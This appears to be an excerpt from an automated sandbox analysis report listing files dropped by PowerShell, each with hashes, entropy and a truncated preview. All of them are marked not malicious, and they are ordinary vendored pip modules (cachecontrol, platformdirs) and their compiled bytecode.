                                                                                                    Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k(..r...e...........y.y.)......)...annotationsN)...ArgumentParser)...TYPE_CHECKING)...requests)...CacheControlAdapter)...DictCache)...logger)...Namespace)...CacheControllerc..........................t.........j...................t.........j.............................t.........j...........................}.t.........j...................|...........y.).N).r......setLevel..logging..DEBUG..StreamHandler..addHandler)...handlers.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/_cmd.py..setup_loggingr........s..........O.O.G.M.M..".....#..#..%.G..........g........c...........................t.........t.................d.d.d...........}.t.........j...........................}.|.j...................d.|...........|.j...................d.|....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6474
                                                                                                    Entropy (8bit):5.426638984633935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:gN5yxCMGzojvCm5p45T6/no2w9DlRhr5+6PNpJqn:U58CMGkjvCm5pi6g2k5R/+6PNpJq
                                                                                                    MD5:34CFCF4BFE04E649DB6AD72984D0A6A7
                                                                                                    SHA1:9B427604B3151B8AE6E47D8A2BAEE387DEDBF6FB
                                                                                                    SHA-256:E031A2FE2B67CF46EC7B247A0DD400539B422CCF231F9E11BD4F5242FAD1DA02
                                                                                                    SHA-512:79AAFD20F176F63B9D5943914BF043C59662CF6E89F13D013B7CCC658A1CABD74FF44226CA0F282FF9DECF39CF30284D562B3AA114B6E02EF282BC8B29A04131
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...annotationsN)...TYPE_CHECKING..Any..Collection..Mapping)...HTTPAdapter)...DictCache)...PERMANENT_REDIRECT_STATUSES..CacheController)...CallbackFileWrapper)...PreparedRequest..Response)...HTTPResponse)...BaseCache)...BaseHeuristic)...Serializerc.............................e.Z.d.Z.h.d...Z.............d...................................d...f.d...Z.............d...............................d...f.d...Z.....d...................d...f.d...Z.d...f.d...Z...x.Z.S.)...CacheControlAdapter>......PUT..PATCH..DELETEc............................t...........|.....|.i.|.......|...t.................n.|.|._.........|.|._.........|.x.s...d.|._.........|.x.s...t.........}...|.|.j...................|.|...........|._.........y.).N)...GET)...cache_etag
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3819
                                                                                                    Entropy (8bit):5.039434720378563
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:S6peOcc8vPrnfpEs27i/7dxnAtZgkwsRZLKfuZBc6jc6Vonx1YBT:adVvPjfp/7T5sRZLU0c6wwons
                                                                                                    MD5:C801618D006ABABE98BF74FE051054DB
                                                                                                    SHA1:588CEE23FF9396105E85F6744DD4C260F52A316D
                                                                                                    SHA-256:F3F3192EEE38AF14762F680B9A8C473928600D3C95DB8116A0EB86C25C98D685
                                                                                                    SHA-512:90CE69BDA1A3864EEB4265D49A82F7C22F09B65D406D78C849270BBF1429E1FE58DA38D40BF4E268897903CDF5E90BF49442FC3F53417F8F2E5C3794F1825EBF
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).zb.The cache object API for implementing caches. The default is a thread.safe in-memory dictionary.......)...annotations)...Lock)...IO..TYPE_CHECKING..MutableMapping)...datetimec.....................>.....e.Z.d.Z.d.d...Z...d...............d.d...Z.d.d...Z.d.d...Z.y.)...BaseCachec...........................t.....................N....NotImplementedError....self..keys.... .jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/cache.py..getz.BaseCache.get.............!..#..#.....Nc...........................t...................r....r......r....r......value..expiress.... r......setz.BaseCache.set....s.........."..#..#r....c...........................t...................r....r....r....s.... r......deletez.BaseCache.delete....r....r....c...........................y.r.....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16177
                                                                                                    Entropy (8bit):5.433285475559155
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:co/VNuqCUx54XW3uErFehV0llOf6gYKFqvNgxOPpwWrQ:coNQqXxyXWzrFJlOf6gYkqFg42WrQ
                                                                                                    MD5:A1A9377FE5608120945BF6D7FE860484
                                                                                                    SHA1:B7639679EBC5E7D3BB3BDC2AD7298C643A4DE890
                                                                                                    SHA-256:B7103E855D575B72B7351FF48CC2EC68D164415104EC5DA50174EEDAB32F52CC
                                                                                                    SHA-512:18A5B13B8476398B8035F61A3768E663442DF233C267B0CAF280DB3C9B0D1F92863C2EB7864C63DD68762E5B9BFD3D987E4E9DE51CA69A37542EA2769D042550
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.G..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j4..................e.........Z...e.j:..................d.........Z.d.Z.d.d...Z ..G.d...d.........Z!y.).z7.The httplib2 algorithms ported for use with requests.......)...annotationsN)...parsedate_tz)...TYPE_CHECKING..Collection..Mapping)...CaseInsensitiveDict)...DictCache..SeparateBodyBaseCache)...Serializer)...Literal)...PreparedRequest)...HTTPResponse)...BaseCachez9^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?)..-....4...c..........................t.........j...................|.........}.|...J...|.j...........................}.|.d.....|.d.....|.d.....|.d.....|.d.....f.S.).z.Parses a URI using the regex given in Appendix B of RFC 3986... (scheme, authority, path, query, fragment) = parse_uri(uri). .........................)...URI..match..groups)...u
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4357
                                                                                                    Entropy (8bit):5.21870824925254
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ooRZK5w8xH3Ik0BcYL/5x7WTe6wVWqwol/WDBR1ydOWzixv46VF1T7hZ:ooRZiwjv/nWTaBSh4OWmxLV7
                                                                                                    MD5:9EE38147CE0AD6859683F24D140A72E6
                                                                                                    SHA1:3E815F92B93D5EE93C497BA847E1E251E47A29D5
                                                                                                    SHA-256:D745E1164A1D7D6B117F3FFF135A80671F3F47E634851319F98B33FF6F4C1A3E
                                                                                                    SHA-512:292C5DBA9D558223C518F8796B780CA04CE21D8CBF57FF72DCBD7CEEA414EA6CC61098ED5F3824EDCD0891F3A48DB7E0A0520D116C055E16B7BA83300BA5E0E7
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................\.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.....G.d...d.........Z.y.)......)...annotationsN)...NamedTemporaryFile)...TYPE_CHECKING..Any..Callable)...HTTPResponsec.....................N.....e.Z.d.Z.d.Z.............d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.y.)...CallbackFileWrappera..... Small wrapper around a fp object which will tee everything read into a. buffer, and when that file is closed it will execute a callback with the. contents of that buffer... All attributes are proxied to the underlying file object... This class uses members with a double underscore (__) leading prefix so as. not to accidentally shadow an attribute... The data is stored in a temporary file until it is all available. As long. as the temporary files directory is disk-based (sometimes it's a. memory-backed-``tmpfs`` on Linux), data will be unloaded to disk if memory. pressure is high. For small files the
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6704
                                                                                                    Entropy (8bit):5.290888743063452
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XOzYen7/caW4PM7qBBHiYjfgYB5zYdyKq6H+Cmzcl5nMadqmaf2k:xYWbuBBrT5+yKngza5nMadqmaf2k
                                                                                                    MD5:DCE3AFDE99206B060EE79181BF216287
                                                                                                    SHA1:D61302FA53066DB4D230E2C70DC6C5B1AE93A893
                                                                                                    SHA-256:511168AEC7CBA8AF8C3B289865D37FD774E10AC23D940916D32CD90719EBB427
                                                                                                    SHA-512:FEEE7366C6C9516A72748473FF0E808005908AC2DF209FF6613DFD8B9139833AE26AA2934A4BF9148D395DE3F43005D11CA9B3816FC17297057CD288B05E79BF
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z...d.Z.d.d.d...Z.d.d...Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...annotationsN)...datetime..timedelta..timezone)...formatdate..parsedate..parsedate_tz)...TYPE_CHECKING..Any..Mapping)...HTTPResponsez.%a, %d %b %Y %H:%M:%S GMTc.....................Z.....|.x.s#..t.........j...................t.........j...........................}.|.|.z...S...N).r......nowr......utc)...delta..dates.... .oC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/heuristics.py..expire_afterr........s#..........-.8.<.<........-.D....%.<........c.....................Z.....t.........t.........j...................|.j...........................................S.r....).r......calendar..timegm..timetuple)...dts.... r......datetime_to_headerr........s..........h.o.o.b.l.l.n..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6415
                                                                                                    Entropy (8bit):5.3602433624647885
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:yBucKKgtKbEm2jWlq1TTCA4ckzzYS+ugPmpKj:y4cKboEmSR1CAHgz9gPKKj
                                                                                                    MD5:6D02C568388B0F03D617FA4A6799622C
                                                                                                    SHA1:1F7EEEB18E03CED067C2BBA584103DD24723F9D7
                                                                                                    SHA-256:073CEDE2381D4EA13C44DBDF4BB411003C830C33B143D8F93918CFCDD7532872
                                                                                                    SHA-512:9BEDBA9D96B19626FCEAAA033DAB5ACA13652769392372B99BE5534667DC4BEDD519300F61959C79777A345EF8EFDC9551D050E27F5C30C3B3F13AC7F8704FD5
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................|.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.........Z.y.)......)...annotationsN)...IO..TYPE_CHECKING..Any..Mapping..cast)...msgpack)...CaseInsensitiveDict)...HTTPResponse)...PreparedRequestc...........................e.Z.d.Z.d.Z...d...............d.d...Z.d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z.y.)...Serializer..4Nc...........................t.........|.j...........................}.|..<|.j...................d...........}.t.........j...................|.........|._.........t.........|.........|._.........d.|.|.j...................j...........................D.....c.i.c.]...\...}.}.t.........|.........t.........|...............c.}.}.|.j...................|.j...................t.........|.j...........................|.j..............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1684
                                                                                                    Entropy (8bit):5.645883640045186
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1I8HYnREfySAaMGZw550wAAJemwoNv3BnyJC7ij42nD71DExVsXkkyC24h:98Kh16HAoemw8vRyuZ2nDZExOXZ
                                                                                                    MD5:D9146E71B1B727F4436504251BB3D508
                                                                                                    SHA1:3202D04AC9CB1069B7A5EBA4B8DA42495A22537D
                                                                                                    SHA-256:894DF1AEE6A4D95771877D77562B06EA2FE18A164683FEB39FB9427D34060082
                                                                                                    SHA-512:AD46BC3FB29D906AE0128C76E8D9DDAA0445C99B087B2F6A720CBA1018CE905EF72F3F82E5008B3B90DAB858276608D43BA9AD71B122299A4E130B064ACB6A15
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.................d...................................d.d...Z.y.)......)...annotations)...TYPE_CHECKING..Collection)...CacheControlAdapter)...DictCache)...requests)...BaseCache)...CacheController)...BaseHeuristic)...SerializerNc..........................|...t.................n.|.}.|.x.s...t.........}...|.|.|.|.|.|.|...........}.|.j...................d.|...........|.j...................d.|...........|.S.).N)...cache_etags..serializer..heuristic..controller_class..cacheable_methodsz.http://z.https://).r....r......mount)...sess..cacher....r....r....r......adapter_classr......adapters.... .lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/wrapper.py..CacheControlr........s[.........!.=.I.K.e.E..!..8.%8.M.................)..+......G......J.J.y.'.."....J.J.z.7..#....K.....).NTNNNNN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1952
                                                                                                    Entropy (8bit):4.670470726433027
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:oKcXfDGmt/i2IUPK9T+iKiIRI/1PqqH19KZBc3F:SL+9T1YALH19YcV
                                                                                                    MD5:8627F1C3C600A8070AD77ED7A2CE9A12
                                                                                                    SHA1:38A776550E923503DAD5CE04DCCBDC69A1B615C1
                                                                                                    SHA-256:393423EF6B547FC0B5B8481CCDD97719CF2F925752CEC4C84CAB4318A331E33F
                                                                                                    SHA-512:8431EDAF1BD01FCA4F3637E1DDDC329BEBB46BEDF5B4B5CC8EFC611B790B4845E6BACB06E23C9A96B2AE629D85E7A8F49A384AB4B4ADF377F1E0C3A0A38FAFBE
                                                                                                    Malicious:false
                                                                                                    Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0..""".The cache object API for implementing caches. The default is a thread.safe in-memory dictionary..""".from __future__ import annotations..from threading import Lock.from typing import IO, TYPE_CHECKING, MutableMapping..if TYPE_CHECKING:. from datetime import datetime...class BaseCache:. def get(self, key: str) -> bytes | None:. raise NotImplementedError().. def set(. self, key: str, value: bytes, expires: int | datetime | None = None. ) -> None:. raise NotImplementedError().. def delete(self, key: str) -> None:. raise NotImplementedError().. def close(self) -> None:. pass...class DictCache(BaseCache):. def __init__(self, init_dict: MutableMapping[str, bytes] | None = None) -> None:. self.lock = Lock(). self.data = init_dict or {}.. def get(self, key: str) -> bytes | None:. return self.data.get(key, None).. def set(.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):445
                                                                                                    Entropy (8bit):5.2011700370395175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Edne/PzX/hJOWzd2Y251XSnrIma84RBjayle2u0ki/:TzHOPYMO3n4O2e4/
                                                                                                    MD5:7DB7B609E4ABEA072A40269FBEFB530C
                                                                                                    SHA1:C55AA5EA19FF4D3DE5F3E748623A71C8777A2203
                                                                                                    SHA-256:045291E4A00F4C428A209CD312E0330A7E93E4119329841BB1007906E9F401D4
                                                                                                    SHA-512:7F07F3D18C9183607A3EC4827AA51E45991B4C59D70241237F2AEFEEBE7437DB6E0EDB625EE89E86ED805A883A238CA8F06622596EE903A6018C23034A9F1DB4
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf/.........................(.....d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.y.)......)...FileCache..SeparateBodyFileCache)...RedisCache).r....r....r....N)..*pip._vendor.cachecontrol.caches.file_cacher....r.....+pip._vendor.cachecontrol.caches.redis_cacher......__all__........tC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/caches/__init__.py..<module>r........s.............X...B..>..r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7720
                                                                                                    Entropy (8bit):5.163932573267968
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7rXE3OrASIOyVAaQHHIGuh0ZVV7mN+Pdl:7w3OkdOyVLwzmYPdl
                                                                                                    MD5:124AFB4081589EA71B7995FD1CA1D55B
                                                                                                    SHA1:744D888F360771EF2D1B29D6AF2EC1A153793781
                                                                                                    SHA-256:A41A039F48717C178676B9B017AFDDFC9A9C7315F6EE1BE98D7D9441ED9D2B0B
                                                                                                    SHA-512:9DE176F8F8B78773B922B2BAE1E6BD39B20F12F595DA4B9DC664F7137F3B6E087C8AA7C75E818D7A238381357DCAFE90AF567B3BF4EA1F80F236CFFA4EC57CFA
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d...Z...G.d...d.........Z...G.d...d.e.e.........Z...G.d...d.e.e.........Z.d.d...Z.y.)......)...annotationsN)...dedent)...IO..TYPE_CHECKING)...BaseCache..SeparateBodyBaseCache)...CacheController)...datetime)...BaseFileLockc...........................t.........j...................}.|.t.........j...................t.........j...................z...z...}.t.........t.........d.........r.|.t.........j...................z...}.t.........t.........d.........r.|.t.........j...................z...}...t.........j...................|...........t.........j...................|.|.|.........}...t.........j...................|.d.........S.#.t.........$.r...Y..9w.x.Y.w.#...t.........j...................|.............x.Y.w.).N..O_NOFOLLOW..O_BINARY..wb)...os..O_WRONLY..O_CREAT..O_EXCL..hasattrr....r......remove..OSError..open..fdopen..close)...filena
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2748
                                                                                                    Entropy (8bit):4.945541280284739
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:edD9UBAkmuFrX3OoXL4pUn3xlyU6s42iS2z1ua:erUOPZ6L4qn3xlyUG+O
                                                                                                    MD5:8EDD71460ED2677EC024AFC481147ED8
                                                                                                    SHA1:5A316A3F8AFD8D6ACC37AA36341E273F3D8FE1BE
                                                                                                    SHA-256:AD0A0CAC7F3AE6E496D0363854F773C1F0E7B421F770F19C77C9B918C674930F
                                                                                                    SHA-512:38A7B4247BB1A3267F9707DEAABC8C9D86F598C769FEE154DF8868A4BF78737C65F77FDECE9B3264A88CD49B0E3E6744A510F451ECE7CE734E76FB808106FB74
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfj.........................^.....d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...annotations)...datetime..timezone)...TYPE_CHECKING)...BaseCache)...Redisc.....................N.....e.Z.d.Z.d.d...Z.d.d...Z...d...............d.d...Z.d.d...Z.d.d...Z.d.d...Z.y.)...RedisCachec...........................|.|._.........y...N)...conn)...selfr....s.... .wC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/caches/redis_cache.py..__init__z.RedisCache.__init__....s..................c.....................8.....|.j...................j...................|.........S.r....).r......get..r......keys.... r....r....z.RedisCache.get....s..........y.y.}.}.S..!..!r....Nc..........................|.s.|.j...................j...................|.|...........y.t.........|.t.................r{t.........j...................t.........j...........................}.|.j.....................|.j..............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5352
                                                                                                    Entropy (8bit):4.5310311547028475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qcfKVC6+gjZRGpxpLdzPCvhk68hT3EBZVQ0PDHdQSTD1617:qgi+YShLdzPYYT+ZfH/D1W7
                                                                                                    MD5:A0392FBE7C6A00DAC7915C652EF1439F
                                                                                                    SHA1:9A65CFBE44F8B9C4D63BC4C1B7E48785000831D9
                                                                                                    SHA-256:DF3F0058A0FEBDF29E889A88CCB989C8862D476C9DE93B21DEED53C8B450A084
                                                                                                    SHA-512:115A80FBEE84CAFCB6B09547A62F9AB85233B65A663D0F9D715D5F7607A314EDB044FBC6E7384A8A25759DC65B1F2B6F884B8415290788BAA8DBD0892DE4452D
                                                                                                    Malicious:false
                                                                                                    Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import hashlib.import os.from textwrap import dedent.from typing import IO, TYPE_CHECKING..from pip._vendor.cachecontrol.cache import BaseCache, SeparateBodyBaseCache.from pip._vendor.cachecontrol.controller import CacheController..if TYPE_CHECKING:. from datetime import datetime.. from filelock import BaseFileLock...def _secure_open_write(filename: str, fmode: int) -> IO[bytes]:. # We only want to write to this file, so open it in write only mode. flags = os.O_WRONLY.. # os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only. # will open *new* files.. # We specify this because we want to ensure that the mode we pass is the. # mode of the file.. flags |= os.O_CREAT | os.O_EXCL.. # Do not follow symlinks to prevent someone from making a symlink that. # we follow and insecurely open a cache file.. if hasattr(os, "O_NO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1386
                                                                                                    Entropy (8bit):4.566143866650669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VO7tKxttZO2dc9TAHJiPZSBIqfWRNmmi9TeuHJOp7Rk6RMP+in81KS:o7GtU9TYJi+IqfWNm7peuHYVk6MP+1KS
                                                                                                    MD5:FEFE321269EFACC26B40436D7FF65295
                                                                                                    SHA1:4049DD3D0F66A44F5FF886D4177DFC9CCB83DC03
                                                                                                    SHA-256:F6B9AAC2D62EFE58D5916EBFA0BA9B0BB11A5FF6BC613FF22EE9DAF9E4B4760A
                                                                                                    SHA-512:87331B1EC32D54A10CD86A4222BAA0F35284E3899CBF07A6BC46D079B0B20F788606CFF381CD88012BCB6CB584C4EC4C37971D6E77AB654A2C60C8642ED63F15
                                                                                                    Malicious:false
                                                                                                    Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations...from datetime import datetime, timezone.from typing import TYPE_CHECKING..from pip._vendor.cachecontrol.cache import BaseCache..if TYPE_CHECKING:. from redis import Redis...class RedisCache(BaseCache):. def __init__(self, conn: Redis[bytes]) -> None:. self.conn = conn.. def get(self, key: str) -> bytes | None:. return self.conn.get(key).. def set(. self, key: str, value: bytes, expires: int | datetime | None = None. ) -> None:. if not expires:. self.conn.set(key, value). elif isinstance(expires, datetime):. now_utc = datetime.now(timezone.utc). if expires.tzinfo is None:. now_utc = now_utc.replace(tzinfo=None). delta = expires - now_utc. self.conn.setex(key, int(delta.total_seconds()), value). else:. self.conn.setex(key, expires, va
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18384
                                                                                                    Entropy (8bit):4.325418238484077
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:imWeGuWXURXpdFnVQOV5EeGhwTpZMUXdZRo4URfWkEVhMZReiL7gZ2+jvB:imfGjAnVQgOIpFtKskEVhMZRegM2+jZ
                                                                                                    MD5:024143284455A6479B08DAC28CF5E997
                                                                                                    SHA1:27DD3070D55DC49060B35B8880A31EE4FE97D14F
                                                                                                    SHA-256:91E08503765A3556964F01DDE85D73A9685BE2FCAF371FD4BD9BA8E6221831FA
                                                                                                    SHA-512:129889D0FEB5D525A0BB8E1455DBA2F00A75FE962A967C1E1563E1D3077F3F0039E477D59EB0095FAB2DE500D0A111160EC499B8E0A4E9D0470606543F1B9704
                                                                                                    Malicious:false
                                                                                                    Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0..""".The httplib2 algorithms ported for use with requests..""".from __future__ import annotations..import calendar.import logging.import re.import time.from email.utils import parsedate_tz.from typing import TYPE_CHECKING, Collection, Mapping..from pip._vendor.requests.structures import CaseInsensitiveDict..from pip._vendor.cachecontrol.cache import DictCache, SeparateBodyBaseCache.from pip._vendor.cachecontrol.serialize import Serializer..if TYPE_CHECKING:. from typing import Literal.. from pip._vendor.requests import PreparedRequest. from pip._vendor.urllib3 import HTTPResponse.. from pip._vendor.cachecontrol.cache import BaseCache..logger = logging.getLogger(__name__)..URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")..PERMANENT_REDIRECT_STATUSES = (301, 308)...def parse_uri(uri: str) -> tuple[str, str, str, str, str]:. """Parses a URI using the regex given
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4292
                                                                                                    Entropy (8bit):4.43121045074475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:o7zK5w8xH3Ik0BcYV4Q9z76G5Md0YnZqCT+OdDkTV4Fl4tDiSKaHLFHEKR3nqTE+:XwjgGO/8VvRK+Rnjq
                                                                                                    MD5:6EA86F71B320920D475B9387ECCBA092
                                                                                                    SHA1:0EA30FC3F74DC1424F3638908B8E02270667FC40
                                                                                                    SHA-256:493B6D1A620F06F673B766F9D5D50EC28597E5CADC302A4A64E8AC3377F904D7
                                                                                                    SHA-512:1CA27961486D141F73AA65DDF86E9CE30447B62D690C52D14CF02BBDE9F20129B0DC94FAD66C9021E4613823247AF8DE0B88405F88D8C56B22C0B9F483A1A2F1
                                                                                                    Malicious:false
                                                                                                    Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import mmap.from tempfile import NamedTemporaryFile.from typing import TYPE_CHECKING, Any, Callable..if TYPE_CHECKING:. from http.client import HTTPResponse...class CallbackFileWrapper:. """. Small wrapper around a fp object which will tee everything read into a. buffer, and when that file is closed it will execute a callback with the. contents of that buffer... All attributes are proxied to the underlying file object... This class uses members with a double underscore (__) leading prefix so as. not to accidentally shadow an attribute... The data is stored in a temporary file until it is all available. As long. as the temporary files directory is disk-based (sometimes it's a. memory-backed-``tmpfs`` on Linux), data will be unloaded to disk if memory. pressure is high. For small files the disk usually won't be used at all,. it'll
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9454
                                                                                                    Entropy (8bit):5.249961242602825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ek/yKfyqItKHYfBSlfSUgHWTKW6pOK3MmaJ9ZTQs:ek/Zfyq9xls2GW6pl3MjJXT/
                                                                                                    MD5:6A9F9FDB0AE30CFEB7090E53B928E0F7
                                                                                                    SHA1:A8AD5C902DB934D930C70A4F67597E939F584F2F
                                                                                                    SHA-256:97120A076C82A70989DF5F1F5E774BAC9EE93E43E08B6CCB92E33B10ABB90E9B
                                                                                                    SHA-512:8E0818DC7E6E4A52C28A8BBD2FEF44828F214022A99914AABD0D5BEBB46DAE2612D21FBE26B7AEACD26EE9BEA02742B70AEC84FA0961660EFE7F0CBE7512E624
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf+.........................,.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z...e.d...........d.d...........Z.d.g.Z.y.).z.Android......)...annotationsN)...lru_cache)...cast.....)...PlatformDirsABCc...........................e.Z.d.Z.d.Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.e.d.d...........Z.y.)...Androida$.... Follows the guidance `from here <https://android.stackexchange.com/a/216132>`_. Makes use of the. `appname <platformdirs.api.PlatformDirsABC.appname>`,. `version <platformdirs.api.PlatformDirsABC.version>`,. `ensure_exists <platformdirs.api.PlatformDirsABC
